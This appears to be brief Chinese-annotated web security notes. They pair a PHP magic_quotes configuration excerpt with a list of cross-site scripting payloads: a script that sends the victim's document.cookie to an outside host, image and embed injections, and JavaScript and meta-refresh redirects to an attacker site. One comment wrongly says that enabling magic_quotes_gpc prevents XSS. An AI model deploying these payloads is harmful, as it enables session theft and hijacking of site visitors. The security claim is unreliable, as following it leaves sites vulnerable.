; Magic quotes for incoming GET/POST/Cookie data.
; 设置成On可避免跨站攻击
magic_quotes_gpc = On
; Magic quotes for runtime-generated data, e.g. data from SQL, from exec(), etc.
magic_quotes_runtime = Off
; Use Sybase-style magic quotes (escape ' with '' instead of \').
;设置成On可以将'专成''
magic_quotes_sybase = Off
获取cookie
<script>window.open("http://www.wufeng.com/cookie.php?cookies="+document.cookie);</script>
避免跨站攻击可以使用:htmlentities 函数
图片攻击:<IMG SRC="http://hax0r.com/Haxored.png">
或者视频flash:<EMBED SRC= http://hax0r.com/Haxored.swf
还有网站重定向:<script>window.open( "http://www.hax0r.com/Haxored.html" )</script>
也可以:<meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />
绕过字符过滤